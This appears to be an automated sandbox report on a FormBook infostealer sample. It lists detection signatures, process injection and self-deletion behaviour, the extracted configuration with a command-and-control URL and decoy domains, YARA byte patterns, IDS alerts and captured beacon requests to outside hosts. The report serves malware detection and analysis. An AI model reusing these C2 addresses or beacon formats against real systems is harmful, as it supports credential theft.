Analysis Report KY4cmAI0jU.exe

Overview

General Information

Sample Name: KY4cmAI0jU.exe
Analysis ID: 433078
MD5: 8c35ac8d43f7e59105902fa16114144e
SHA1: c1a0e5de1121e55c22649182c923b41efd4e2848
SHA256: 1a08fc838c4ebab6b986b6010e2074a05c29916cd38096e7f7d26a6455917508
Tags: exe, Formbook

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • KY4cmAI0jU.exe (PID: 2128 cmdline: 'C:\Users\user\Desktop\KY4cmAI0jU.exe' MD5: 8C35AC8D43F7E59105902FA16114144E)
    • KY4cmAI0jU.exe (PID: 1632 cmdline: 'C:\Users\user\Desktop\KY4cmAI0jU.exe' MD5: 8C35AC8D43F7E59105902FA16114144E)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • help.exe (PID: 5448 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
          • cmd.exe (PID: 5380 cmdline: /c del 'C:\Users\user\Desktop\KY4cmAI0jU.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.alberthospice.com/sh2m/"], "decoy": ["ladorreguita.com", "starflexacademy.com", "aumhouseholds.com", "ylcht.info", "skill-seminar.com", "insurancedowntown.com", "baliholisticacademy.com", "andrealuz.com", "choicecarloans.com", "ezonkorea.com", "charteroaktech.com", "acpcomponents.com", "portugalthecoder.com", "ipoolhub.com", "webfwrd.com", "swiggy.company", "covidproofevents.com", "jianhufeiyang.space", "oohvd-amai.xyz", "directprnews.com", "kfrx-assuv.xyz", "take-me-bergen.com", "audiosech.club", "infinitytradingapp.com", "pujajaiswal.com", "slateradvertising.com", "tensefit.com", "beyou.fitness", "maybowser.com", "thenewrepublican.net", "kenms.com", "rjpadvisors.com", "pridebiking.com", "99kweeclub.com", "wakarasu.com", "millabg.com", "beenovus.com", "gregcasarsocialist.com", "rentmystuff.info", "adultvideolife.xyz", "ytjee4x6zm9wg.net", "dbsjsa.net", "ziduh.com", "track-website.website", "societalfusion.com", "in-homenannies.com", "sudhakarfurniture.com", "services-nz.com", "obi4ex.com", "geniepinie.com", "dilossearticle.com", "changecamps.com", "meganfantastic.com", "jaisl11.com", "sciencebasedmasks.com", "candydulce.com", "tetra-oil.com", "mkpricephoto.com", "hayvankayit.com", "ellasween.com", "gracelandofkrotzsprings.com", "dndemystified.com", "blinbins.com", "lolasvibe.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.KY4cmAI0jU.exe.2170000.3.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.KY4cmAI0jU.exe.2170000.3.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.KY4cmAI0jU.exe.2170000.3.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x158c9:$sqlite3step: 68 34 1C 7B E1
    • 0x159dc:$sqlite3step: 68 34 1C 7B E1
    • 0x158f8:$sqlite3text: 68 38 2A 90 C5
    • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
    • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
1.1.KY4cmAI0jU.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.1.KY4cmAI0jU.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.alberthospice.com/sh2m/"], "decoy": ["ladorreguita.com", "starflexacademy.com", "aumhouseholds.com", "ylcht.info", "skill-seminar.com", "insurancedowntown.com", "baliholisticacademy.com", "andrealuz.com", "choicecarloans.com", "ezonkorea.com", "charteroaktech.com", "acpcomponents.com", "portugalthecoder.com", "ipoolhub.com", "webfwrd.com", "swiggy.company", "covidproofevents.com", "jianhufeiyang.space", "oohvd-amai.xyz", "directprnews.com", "kfrx-assuv.xyz", "take-me-bergen.com", "audiosech.club", "infinitytradingapp.com", "pujajaiswal.com", "slateradvertising.com", "tensefit.com", "beyou.fitness", "maybowser.com", "thenewrepublican.net", "kenms.com", "rjpadvisors.com", "pridebiking.com", "99kweeclub.com", "wakarasu.com", "millabg.com", "beenovus.com", "gregcasarsocialist.com", "rentmystuff.info", "adultvideolife.xyz", "ytjee4x6zm9wg.net", "dbsjsa.net", "ziduh.com", "track-website.website", "societalfusion.com", "in-homenannies.com", "sudhakarfurniture.com", "services-nz.com", "obi4ex.com", "geniepinie.com", "dilossearticle.com", "changecamps.com", "meganfantastic.com", "jaisl11.com", "sciencebasedmasks.com", "candydulce.com", "tetra-oil.com", "mkpricephoto.com", "hayvankayit.com", "ellasween.com", "gracelandofkrotzsprings.com", "dndemystified.com", "blinbins.com", "lolasvibe.com"]}
Multi AV Scanner detection for submitted file
Source: KY4cmAI0jU.exe, Virustotal: Detection: 34%
Source: KY4cmAI0jU.exe, Metadefender: Detection: 17%
Source: KY4cmAI0jU.exe, ReversingLabs: Detection: 41%
Yara detected FormBook
Source: Yara match, File source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: KY4cmAI0jU.exe, Joe Sandbox ML: detected
Source: 6.2.help.exe.3407960.5.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.help.exe.9fd7e8.1.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: KY4cmAI0jU.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP source: KY4cmAI0jU.exe, 00000000.00000003.213745090.00000000099C0000.00000004.00000001.sdmp, KY4cmAI0jU.exe, 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, help.exe, 00000006.00000002.481376973.0000000002FEF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: KY4cmAI0jU.exe, help.exe
Source: Binary string: help.pdbGCTL source: KY4cmAI0jU.exe, 00000001.00000002.266136705.0000000000A40000.00000040.00000001.sdmp
Source: Binary string: help.pdb source: KY4cmAI0jU.exe, 00000001.00000002.266136705.0000000000A40000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe, Code function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe, Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe, Code function: 0_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe, Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe, Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe, Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe, Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe, Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe, Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\help.exe, Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\help.exe, Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\help.exe, Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49730 -> 172.67.206.33:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49730 -> 172.67.206.33:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49730 -> 172.67.206.33:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 104.21.89.72:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 104.21.89.72:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 104.21.89.72:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 3.34.12.41:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 3.34.12.41:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 3.34.12.41:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.alberthospice.com/sh2m/
Source: global traffic, HTTP traffic detected: GET /sh2m/?i0=Y4nA7D8ZanudJV/n7ckHSBWOhW22WEJR/asQiGNTmjaNDyrYZ8Q/zKqiBMBjk5weHegN&4huxZr=02MtK8MPsR3L HTTP/1.1 | Host: www.take-me-bergen.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /sh2m/?i0=CQ6AMTNmXrT6GsHyvLqygrxreupfdtmN+4T1XtvAXMgditzRj6Y1Xuw537ryrSqhWitY&4huxZr=02MtK8MPsR3L HTTP/1.1 | Host: www.starflexacademy.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /sh2m/?i0=AN9Dli3eSwBxhLN7Z92H8FzDOGpUzm7G3BkkvfgYwC6zoN6kwH9F+lw53Jt7Bui6OWXD&4huxZr=02MtK8MPsR3L HTTP/1.1 | Host: www.ladorreguita.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /sh2m/?i0=Qqwfsv61LD8gOSv2HQNs13/ILT3hkPAGuV1QQZOHa/kG/rdN/rA5QVkGcwq5olxFBDS9&4huxZr=02MtK8MPsR3L HTTP/1.1 | Host: www.candydulce.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /sh2m/?i0=c9aUCvLa9Ql2a6xFKe5xJWdXulTfAnmJmW0relGKzVi+CMwVFA49Zy8Fshmf8yObHaZC&4huxZr=02MtK8MPsR3L HTTP/1.1 | Host: www.insurancedowntown.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /sh2m/?i0=UiVwUNrNLQfwtohPmVYH70t5lUixURpqlrLqHTUDsyREBVD/9Tpqi3FDGPs9lJ3zNa3b&4huxZr=02MtK8MPsR3L HTTP/1.1 | Host: www.ezonkorea.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /sh2m/?i0=e+6U2v/464/49Vrt/4yGVwpDKMjmMUzpCV508o5/z2Kz7+x90JHivdh29zvGxsTtrzAO&4huxZr=02MtK8MPsR3L HTTP/1.1 | Host: www.dndemystified.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /sh2m/?i0=uHvpiI6aXo2y2Po+6svR0qIfr0jRx6IK9412etvelJearRBAFXnPloN9l4KAKLF+tazG&4huxZr=02MtK8MPsR3L HTTP/1.1 | Host: www.meganfantastic.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View, IP Address: 3.143.65.214
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View, ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: unknown, DNS traffic detected: queries for: www.take-me-bergen.com
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 11 Jun 2021 07:03:07 GMT | Content-Type: text/html | Content-Length: 153 | Connection: close | Server: nginx/1.16.1 | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Source: explorer.exe, 00000002.00000000.235645842.0000000008907000.00000004.00000001.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: KY4cmAI0jU.exe, String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: KY4cmAI0jU.exe, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Source: help.exe, 00000006.00000002.482952749.0000000003582000.00000004.00000001.sdmp, String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: help.exe, 00000006.00000002.482952749.0000000003582000.00000004.00000001.sdmp, String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
Source: help.exe, 00000006.00000002.482952749.0000000003582000.00000004.00000001.sdmp, String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: C:\Users\user\Desktop\KY4cmAI0jU.exe, Code function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
